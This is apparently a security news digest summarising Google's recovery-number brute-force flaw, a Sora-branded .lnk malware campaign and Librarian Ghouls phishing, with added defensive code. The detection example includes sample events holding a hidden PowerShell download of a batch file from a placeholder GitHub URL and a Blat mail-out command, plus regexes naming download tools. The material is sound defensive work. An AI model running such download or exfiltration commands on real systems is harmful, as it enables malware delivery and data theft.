TRENDING TOPICS JUNE 10, 2025

Google Fixes Flaw Allowing Phone Number Brute-Forcing for Account Recovery

A serious flaw in Google’s account recovery process was uncovered that allowed attackers to brute-force the recovery phone number associated with a Google account. The flaw was identified in an older, deprecated version of Google’s username recovery form, which was designed to help users recover their Google accounts. It allowed attackers to bypass CAPTCHA-based rate limits and try numerous phone-number combinations quickly, eventually revealing the full phone number. The attack chain was further enabled by social engineering techniques: attackers could gather the victim’s display name and partially unmask the phone number using Google services, including Looker Studio. While no direct exploitation by specific threat actors has been tied to this flaw, it poses a significant security risk, especially for users relying on phone numbers for two-factor authentication (2FA). The risk and potential impact of this flaw are severe. With a victim’s phone number in hand, attackers could perform a SIM-swapping attack, hijacking the phone number and using it to reset the victim’s password on other accounts tied to that number. This could lead to widespread account takeovers, financial theft, or unauthorized access to sensitive personal information. After the flaw was responsibly disclosed by researcher “brutecat” in April 2025, Google awarded a $5,000 bug bounty and fixed the issue by completely removing the affected username recovery form in June 2025. To mitigate the risk, users should avoid relying solely on recovery phone numbers and instead enable app-based 2FA or hardware security keys. Google’s response to the issue was prompt, but users should remain vigilant about unusual recovery or login requests to protect their accounts from future exploits.
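The brute force described above is possible when a recovery form throttles only per client (IP or CAPTCHA token), so that rotating clients keeps the guessing going against one account. The following is an added example, not Google’s code: a sliding-window limiter keyed on the target account as well as the client, so total guesses against one account are capped however many clients are used. The target identifier and the limits are assumptions.

```python
"""Per-target throttling for an account-recovery form. Added example, not
Google's code. The brute force above works when the only throttle is
per-client (IP or CAPTCHA token): rotating clients resets the count while
the same account keeps being guessed against. Keying the window on the
target account (an assumed identifier here) caps total guesses regardless
of how many clients the attacker uses."""
from collections import defaultdict, deque


class RecoveryRateLimiter:
    """Sliding-window limiter over two keys; a guess is rejected if either
    the target's or the client's window is already full."""

    def __init__(self, per_target=5, per_client=20, window_s=3600):
        self.per_target, self.per_client, self.window_s = per_target, per_client, window_s
        self._target = defaultdict(deque)  # account id -> guess timestamps
        self._client = defaultdict(deque)  # client id  -> guess timestamps

    def _prune(self, q, now):
        while q and now - q[0] >= self.window_s:
            q.popleft()

    def allow(self, target, client, now):
        """Return True if this guess may proceed. Rejected guesses are recorded
        too, so continued hammering keeps the target's window full instead of
        letting the oldest entries expire. Trade-off: a per-target lockout can
        be used to deny recovery to the legitimate owner, so pair it with a
        notification to the account holder rather than silently blocking."""
        tq, cq = self._target[target], self._client[client]
        self._prune(tq, now)
        self._prune(cq, now)
        ok = len(tq) < self.per_target and len(cq) < self.per_client
        tq.append(now)
        cq.append(now)
        return ok


def guesses_accepted(limiter, target, n, start=0.0):
    """Constructed scenario: one attacker rotating a fresh client identity per
    guess against one target. Returns how many guesses got through."""
    return sum(limiter.allow(target, f"client-{i}", start + i) for i in range(n))
```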

OpenAI's Sora Video Generation Model Exploited to Distribute Malware

A new campaign has been uncovered in which threat actors exploit the growing popularity of OpenAI’s Sora, a state-of-the-art video generation model, to distribute malware. First discovered on VirusTotal in Vietnam on May 21, 2025, the attack involves malicious software disguised as a legitimate shortcut file named “SoraAI.lnk.” This tactic leverages the well-known Sora brand to deceive users into initiating a multi-stage attack. Once the user clicks the shortcut, it triggers a PowerShell process that downloads a batch file from a GitHub repository. This is followed by additional malicious files, including Python packages, that help establish persistence and execute harmful scripts on the victim’s machine. The malware collects sensitive information, including browser cookies, passwords, Wi-Fi credentials, and cryptocurrency wallet details, and exfiltrates this data to attackers through Telegram or an external hosting service, GoFile.io. The use of GitHub to host malicious payloads and the stealthy nature of the attack make it harder for victims to identify the threat at an early stage. The campaign, which exploits the trust users place in popular AI tools like Sora, is still ongoing, with reports of it spreading to various countries. Although the exact number of affected users is unknown, the damage caused by this malware could be substantial, leading to identity theft and the potential misuse of sensitive data. The attack chain, from the disguised shortcut to the exfiltration of harvested data, is a sophisticated example of social engineering, relying on the familiarity of Sora’s name to lure victims into executing harmful scripts. Security experts recommend that users download files only from trusted sources, be cautious when executing files from unfamiliar locations, and use reliable antivirus solutions capable of detecting malware at its various stages.
As the campaign continues to unfold, it serves as a reminder of the ever-evolving nature of cyberattacks and the importance of staying vigilant against seemingly harmless software.

Librarian Ghouls: Sophisticated Phishing and Malware Campaign

The APT group known as “Librarian Ghouls,” also tracked as “Rare Werewolf” and “Rezet,” has been actively targeting organizations across Russia and the Commonwealth of Independent States (CIS) with a series of highly sophisticated malware deployment campaigns. In activity observed since May 2025, the group has focused on Russian companies, leveraging targeted phishing emails as its primary method of infection. These phishing emails often appear to be legitimate communications from trusted entities and contain password-protected archives with malicious executables. Once the victim unlocks and executes these files, a multi-stage infection begins, using legitimate third-party software to mask the attack and evade detection. This approach complicates attribution, as the attackers use well-known software to deploy remote access tools, steal sensitive credentials, and even install crypto-mining malware like XMRig on compromised systems. The group’s attack methods include using self-extracting installers, like Smart Install Maker, to distribute seemingly harmless software like 4t Tray Minimizer, which minimizes visible activity on the infected system. The malicious files are then extracted to directories, including C:\Intel, where they run scripts to connect to command-and-control (C2) servers. These scripts download additional payloads, like AnyDesk for remote access, Blat for SMTP-based data exfiltration, and Defender Control to disable Windows Defender. The attackers further orchestrate system compromise by automating daily activations of Microsoft Edge and using customized tools like WinRAR and WebBrowserPassView to steal credentials and data. This sophisticated and evolving attack chain highlights the persistent nature of the threat, and organizations in the region are urged to update their security protocols and remain vigilant for these indicators of compromise.
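Both process chains described above (the Sora shortcut spawning PowerShell to fetch a batch file from GitHub, and the Librarian Ghouls staging under C:\Intel followed by Blat, AnyDesk and WebBrowserPassView) can be expressed as simple process-creation detections. The following is an added example, not code from either report’s authors: three rules run over constructed Sysmon-style events. The field names, the sample paths and URL, the explorer.exe parent standing in for a shortcut click, and the tool binary names are assumptions, not indicators from the reports.

```python
"""Detection for the two process chains above (Sora .lnk lure, Librarian Ghouls
staging). Added example, not vendor/researcher code. Events are constructed
Sysmon-style process-creation records; paths, URLs and tool names are assumed."""
import re
# Sora lure: shortcut click (parent explorer.exe) -> powershell.exe fetching a batch file from GitHub.
_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b", re.I)
_GITHUB = re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I)
# Librarian Ghouls: payloads extracted to C:\Intel, then Blat / AnyDesk / WebBrowserPassView.
_STAGING = re.compile(r"^c:\\intel\\", re.I)
_TOOLING = ("blat", "anydesk", "webbrowserpassview")  # binary names assumed

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_lnk_powershell_github(ev):
    return (_basename(ev["image"]) == "powershell.exe"
            and _basename(ev["parent"]) == "explorer.exe"
            and bool(_DOWNLOAD.search(ev["cmdline"])) and bool(_GITHUB.search(ev["cmdline"])))

def rule_exec_from_staging(ev):
    return bool(_STAGING.match(ev["image"]))

def rule_known_tooling(ev):
    # Hunting signal only: legitimate AnyDesk/Blat installs fire too; correlate with the staging rule.
    return any(t in _basename(ev["image"]) for t in _TOOLING)

RULES = {"lnk_powershell_github_download": rule_lnk_powershell_github,
         "exec_from_c_intel": rule_exec_from_staging,
         "third_party_tooling": rule_known_tooling}

def evaluate(events):
    """Return {rule_name: [indices of events that matched]}."""
    hits = {}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(i)
    return hits

_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"parent": _EXPLORER, "image": _PS, "cmdline":
     "powershell -w hidden iwr https://raw.githubusercontent.com/EXAMPLE/x/main/run.bat -OutFile %TEMP%\\run.bat"},
    {"parent": _EXPLORER, "image": _PS, "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"parent": r"C:\Intel\setup.exe", "image": r"C:\Intel\blat.exe",
     "cmdline": "blat.exe report.txt -to ops@example.invalid -server smtp.example.invalid"},
    {"parent": _EXPLORER, "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
]
```

The last sample event shows why the tooling rule is a hunting signal rather than an alert on its own: a normally installed AnyDesk matches it, while only the C:\Intel execution also trips the staging rule.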

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.